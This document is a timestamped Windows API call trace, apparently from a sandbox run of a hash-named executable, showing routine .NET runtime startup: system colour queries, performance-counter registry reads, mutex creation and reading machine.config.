[0116.676] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x1, wParam=0x0, lParam=0x19e508) returned 0x0
[0116.677] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0116.677] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0116.677] GetLastError () returned 0x0
[0116.715] GetSysColor (nIndex=10) returned 0xb4b4b4
[0116.715] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=2) returned 0xd1b499
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=9) returned 0x0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=12) returned 0xababab
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=15) returned 0xf0f0f0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=20) returned 0xffffff
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=16) returned 0xa0a0a0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=15) returned 0xf0f0f0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=16) returned 0xa0a0a0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=21) returned 0x696969
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=22) returned 0xe3e3e3
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=20) returned 0xffffff
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=18) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=1) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=27) returned 0xead1b9
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=28) returned 0xf2e4d7
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=17) returned 0x6d6d6d
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=13) returned 0xff9933
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=14) returned 0xffffff
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=26) returned 0xcc6600
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=11) returned 0xfcf7f4
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=3) returned 0xdbcdbf
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=19) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=24) returned 0xe1ffff
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=23) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=4) returned 0xf0f0f0
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=30) returned 0xf0f0f0
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=29) returned 0xff9933
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=7) returned 0x0
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=0) returned 0xc8c8c8
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=5) returned 0xffffff
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=6) returned 0x646464
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=8) returned 0x0
[0116.720] GetLastError () returned 0x0
[0120.212] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x76d1e0
[0120.213] GetLastError () returned 0x0
[0120.220] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x76d048
[0120.220] GetLastError () returned 0x0
[0120.299] AdjustWindowRectEx (in: lpRect=0x19e6ec, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19e6ec) returned 1
[0120.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ae20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0120.941] GetLastError () returned 0x0
[0120.943] GetCurrentProcessId () returned 0xaf0
[0120.975] GetComputerNameW (in: lpBuffer=0x786f40, nSize=0x27316d8 | out: lpBuffer="XC64ZB", nSize=0x27316d8) returned 1
[0120.977] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19b280 | out: phkResult=0x19b280*=0x350) returned 0x0
[0120.979] RegQueryValueExW (in: hKey=0x350, lpValueName="Library", lpReserved=0x0, lpType=0x19b2bc, lpData=0x0, lpcbData=0x19b2b8*=0x0 | out: lpType=0x19b2bc*=0x2, lpData=0x0, lpcbData=0x19b2b8*=0x48) returned 0x0
[0120.992] RegQueryValueExW (in: hKey=0x350, lpValueName="Library", lpReserved=0x0, lpType=0x19b2bc, lpData=0x786f40, lpcbData=0x19b2b8*=0x48 | out: lpType=0x19b2bc*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0x19b2b8*=0x48) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19b2c8, lpData=0x0, lpcbData=0x19b2c4*=0x0 | out: lpType=0x19b2c8*=0x4, lpData=0x0, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19b2c8, lpData=0x19b2b4, lpcbData=0x19b2c4*=0x4 | out: lpType=0x19b2c8*=0x4, lpData=0x19b2b4*=0x1, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="First Counter", lpReserved=0x0, lpType=0x19b2c8, lpData=0x0, lpcbData=0x19b2c4*=0x0 | out: lpType=0x19b2c8*=0x4, lpData=0x0, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="First Counter", lpReserved=0x0, lpType=0x19b2c8, lpData=0x19b2b4, lpcbData=0x19b2c4*=0x4 | out: lpType=0x19b2c8*=0x4, lpData=0x19b2b4*=0x1acc, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegCloseKey (hKey=0x350) returned 0x0
[0120.995] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19b270 | out: phkResult=0x19b270*=0x350) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19b2b8, lpData=0x0, lpcbData=0x19b2b4*=0x0 | out: lpType=0x19b2b8*=0x4, lpData=0x0, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19b2b8, lpData=0x19b2a4, lpcbData=0x19b2b4*=0x4 | out: lpType=0x19b2b8*=0x4, lpData=0x19b2a4*=0x3, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19b2b8, lpData=0x0, lpcbData=0x19b2b4*=0x0 | out: lpType=0x19b2b8*=0x4, lpData=0x0, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19b2b8, lpData=0x19b2a4, lpcbData=0x19b2b4*=0x4 | out: lpType=0x19b2b8*=0x4, lpData=0x19b2a4*=0x20000, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19b2b8, lpData=0x0, lpcbData=0x19b2b4*=0x0 | out: lpType=0x19b2b8*=0x3, lpData=0x0, lpcbData=0x19b2b4*=0x30a) returned 0x0
[0120.996] RegQueryValueExW (in: hKey=0x350, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19b2b8, lpData=0x2733f64, lpcbData=0x19b2b4*=0x30a | out: lpType=0x19b2b8*=0x3, lpData=0x2733f64*, lpcbData=0x19b2b4*=0x30a) returned 0x0
[0121.000] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;OICI;FRFWGRGW;;;AU)(A;OICI;FRFWGRGW;;;S-1-5-33)", StringSDRevision=0x1, SecurityDescriptor=0x19b224, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x19b224*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Sacl=0x0*(AclRevision=0x0, Sbz1=0x0, AclSize=0x0, AceCount=0x14, Sbz2=0x0), Dacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x30)), SecurityDescriptorSize=0x0) returned 1
[0121.003] GetLastError () returned 0x0
[0121.007] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x73db28, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x358
[0121.008] GetLastError () returned 0x0
[0121.009] MapViewOfFile (hFileMappingObject=0x358, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x73b0000
[0121.010] VirtualQuery (in: lpAddress=0x73b0000, lpBuffer=0x19b288, dwLength=0x1c | out: lpBuffer=0x19b288*(BaseAddress=0x73b0000, AllocationBase=0x73b0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
[0121.010] GetLastError () returned 0x0
[0121.010] LocalFree (hMem=0x75d2d8) returned 0x0
[0121.011] RegCloseKey (hKey=0x350) returned 0x0
[0121.015] GetVersionExW (in: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0121.015] GetLastError () returned 0x0
[0121.017] GetVersionExW (in: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0121.017] GetLastError () returned 0x0
[0121.019] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2735578, cbSid=0x19b268 | out: pSid=0x2735578*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.019] GetLastError () returned 0x0
[0121.022] CreateMutexW (lpMutexAttributes=0x27356c8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.022] GetLastError () returned 0x0
[0121.023] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.023] GetLastError () returned 0x0
[0121.023] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x273589c, cbSid=0x19b228 | out: pSid=0x273589c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b228) returned 1
[0121.023] GetLastError () returned 0x0
[0121.024] CreateMutexW (lpMutexAttributes=0x27359ac, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x0
[0121.024] GetLastError () returned 0x5
[0121.025] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net data provider for sqlserver") returned 0x35c
[0121.032] GetLastError () returned 0x5
[0121.032] WaitForSingleObject (hHandle=0x35c, dwMilliseconds=0x1f4) returned 0x0
[0121.032] GetLastError () returned 0x5
[0121.032] ReleaseMutex (hMutex=0x35c) returned 1
[0121.032] GetLastError () returned 0x5
[0121.032] CloseHandle (hObject=0x35c) returned 1
[0121.032] GetLastError () returned 0x5
[0121.033] GetCurrentProcessId () returned 0xaf0
[0121.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaf0) returned 0x35c
[0121.036] GetLastError () returned 0x5
[0121.038] GetProcessTimes (in: hProcess=0x35c, lpCreationTime=0x19b22c, lpExitTime=0x19b224, lpKernelTime=0x19b224, lpUserTime=0x19b224 | out: lpCreationTime=0x19b22c, lpExitTime=0x19b224, lpKernelTime=0x19b224, lpUserTime=0x19b224) returned 1
[0121.038] GetLastError () returned 0x5
[0121.039] CloseHandle (hObject=0x35c) returned 1
[0121.039] GetLastError () returned 0x5
[0121.039] ReleaseMutex (hMutex=0x350) returned 1
[0121.039] GetLastError () returned 0x5
[0121.039] CloseHandle (hObject=0x350) returned 1
[0121.039] GetLastError () returned 0x5
[0121.040] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27364b8, cbSid=0x19b268 | out: pSid=0x27364b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.040] GetLastError () returned 0x5
[0121.040] CreateMutexW (lpMutexAttributes=0x27365c8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.040] GetLastError () returned 0x0
[0121.040] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.040] GetLastError () returned 0x0
[0121.044] ReleaseMutex (hMutex=0x350) returned 1
[0121.044] GetLastError () returned 0x0
[0121.045] CloseHandle (hObject=0x350) returned 1
[0121.045] GetLastError () returned 0x0
[0121.045] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2736f10, cbSid=0x19b268 | out: pSid=0x2736f10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.045] GetLastError () returned 0x0
[0121.045] CreateMutexW (lpMutexAttributes=0x2737020, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.045] GetLastError () returned 0x0
[0121.045] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.045] GetLastError () returned 0x0
[0121.045] ReleaseMutex (hMutex=0x350) returned 1
[0121.046] GetLastError () returned 0x0
[0121.046] CloseHandle (hObject=0x350) returned 1
[0121.046] GetLastError () returned 0x0
[0121.046] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27376d0, cbSid=0x19b268 | out: pSid=0x27376d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.046] GetLastError () returned 0x0
[0121.046] CreateMutexW (lpMutexAttributes=0x27377e0, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.046] GetLastError () returned 0x0
[0121.046] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.046] GetLastError () returned 0x0
[0121.046] ReleaseMutex (hMutex=0x350) returned 1
[0121.046] GetLastError () returned 0x0
[0121.047] CloseHandle (hObject=0x350) returned 1
[0121.047] GetLastError () returned 0x0
[0121.047] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2737ea4, cbSid=0x19b268 | out: pSid=0x2737ea4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.047] GetLastError () returned 0x0
[0121.047] CreateMutexW (lpMutexAttributes=0x2737fb4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.047] GetLastError () returned 0x0
[0121.047] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.047] GetLastError () returned 0x0
[0121.047] ReleaseMutex (hMutex=0x350) returned 1
[0121.047] GetLastError () returned 0x0
[0121.048] CloseHandle (hObject=0x350) returned 1
[0121.048] GetLastError () returned 0x0
[0121.048] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x273867c, cbSid=0x19b268 | out: pSid=0x273867c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.048] GetLastError () returned 0x0
[0121.048] CreateMutexW (lpMutexAttributes=0x273878c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.048] GetLastError () returned 0x0
[0121.048] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.048] GetLastError () returned 0x0
[0121.048] ReleaseMutex (hMutex=0x350) returned 1
[0121.048] GetLastError () returned 0x0
[0121.048] CloseHandle (hObject=0x350) returned 1
[0121.049] GetLastError () returned 0x0
[0121.049] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2738e44, cbSid=0x19b268 | out: pSid=0x2738e44*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.049] GetLastError () returned 0x0
[0121.049] CreateMutexW (lpMutexAttributes=0x2738f54, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.049] GetLastError () returned 0x0
[0121.049] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.049] GetLastError () returned 0x0
[0121.049] ReleaseMutex (hMutex=0x350) returned 1
[0121.049] GetLastError () returned 0x0
[0121.049] CloseHandle (hObject=0x350) returned 1
[0121.049] GetLastError () returned 0x0
[0121.050] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2739610, cbSid=0x19b268 | out: pSid=0x2739610*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.050] GetLastError () returned 0x0
[0121.050] CreateMutexW (lpMutexAttributes=0x2739720, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.050] GetLastError () returned 0x0
[0121.050] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.050] GetLastError () returned 0x0
[0121.050] ReleaseMutex (hMutex=0x350) returned 1
[0121.050] GetLastError () returned 0x0
[0121.050] CloseHandle (hObject=0x350) returned 1
[0121.050] GetLastError () returned 0x0
[0121.050] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2739dd0, cbSid=0x19b268 | out: pSid=0x2739dd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.050] GetLastError () returned 0x0
[0121.051] CreateMutexW (lpMutexAttributes=0x2739ee0, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.051] GetLastError () returned 0x0
[0121.051] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.051] GetLastError () returned 0x0
[0121.051] ReleaseMutex (hMutex=0x350) returned 1
[0121.051] GetLastError () returned 0x0
[0121.051] CloseHandle (hObject=0x350) returned 1
[0121.051] GetLastError () returned 0x0
[0121.051] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x273a598, cbSid=0x19b268 | out: pSid=0x273a598*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.052] GetLastError () returned 0x0
[0121.052] CreateMutexW (lpMutexAttributes=0x273a6a8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.052] GetLastError () returned 0x0
[0121.052] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.052] GetLastError () returned 0x0
[0121.052] ReleaseMutex (hMutex=0x350) returned 1
[0121.052] GetLastError () returned 0x0
[0121.052] CloseHandle (hObject=0x350) returned 1
[0121.052] GetLastError () returned 0x0
[0121.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19ad70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0121.776] GetLastError () returned 0x0
[0121.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19ad24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0121.776] GetLastError () returned 0x0
[0121.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ad28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0121.776] GetLastError () returned 0x0
[0122.295] GetVersionExW (in: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0122.295] GetLastError () returned 0x0
[0122.296] GetCurrentProcess () returned 0xffffffff
[0122.296] GetLastError () returned 0x3f0
[0122.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ae38 | out: TokenHandle=0x19ae38*=0x368) returned 1
[0122.298] GetLastError () returned 0x3f0
[0122.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x19a9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
[0122.315] GetLastError () returned 0x0
[0122.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae7c | out: lpFileInformation=0x19ae7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0122.402] GetLastError () returned 0x0
[0122.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19a990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0122.431] GetLastError () returned 0x0
[0122.436] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae74 | out: lpFileInformation=0x19ae74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0122.436] GetLastError () returned 0x0
[0122.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19a8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0122.437] GetLastError () returned 0x0
[0122.437] SetErrorMode (uMode=0x1) returned 0x0
[0122.439] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x370
[0122.439] GetLastError () returned 0x0
[0122.440] GetFileType (hFile=0x370) returned 0x1
[0122.440] SetErrorMode (uMode=0x0) returned 0x1
[0122.441] GetFileType (hFile=0x370) returned 0x1
[0122.727] GetFileSize (in: hFile=0x370, lpFileSizeHigh=0x19ae58 | out: lpFileSizeHigh=0x19ae58*=0x0) returned 0x65b3
[0122.727] GetLastError () returned 0x0
[0122.728] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ae10, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19ae10*=0x1000, lpOverlapped=0x0) returned 1
[0122.728] GetLastError () returned 0x0
[0123.578] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19aa2c, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19aa2c*=0x1000, lpOverlapped=0x0) returned 1
[0123.578] GetLastError () returned 0x0
[0123.603] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a870, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a870*=0x1000, lpOverlapped=0x0) returned 1
[0123.603] GetLastError () returned 0x0
[0123.604] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a870, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a870*=0x1000, lpOverlapped=0x0) returned 1
[0123.604] GetLastError () returned 0x0
